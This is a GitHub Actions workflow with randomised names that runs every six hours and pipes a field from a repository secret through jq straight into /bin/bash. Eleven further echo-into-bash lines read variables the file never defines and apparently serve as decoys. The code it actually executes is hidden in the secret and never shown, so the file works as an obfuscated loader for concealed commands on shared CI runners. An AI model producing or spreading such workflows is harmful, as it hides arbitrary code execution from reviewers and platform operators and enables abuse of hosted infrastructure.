name: cheeseingredient

on:
  workflow_dispatch:
  schedule:
    - cron: '11 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: cheeseingredient
        env:
          wdfh91: ${{ secrets.wdfh91 }}
        run: |
          echo $wdfh91 | jq -r .ypyc897 | /bin/bash
          echo $z2324 | jq -r .wpmpb95063 | /bin/bash
          echo $i42115 | jq -r .j82468 | /bin/bash
          echo $mu142 | jq -r .vllrc01268 | /bin/bash
          echo $jnkjx24104 | jq -r .kzyq2146 | /bin/bash
          echo $r302 | jq -r .epus62 | /bin/bash
          echo $l4 | jq -r .lbzrr823 | /bin/bash
          echo $p03 | jq -r .nudek78 | /bin/bash
          echo $yy39 | jq -r .zyl3 | /bin/bash
          echo $m9352 | jq -r .ra3870 | /bin/bash
          echo $to85510 | jq -r .st53 | /bin/bash
          echo $q5 | jq -r .p706 | /bin/bash

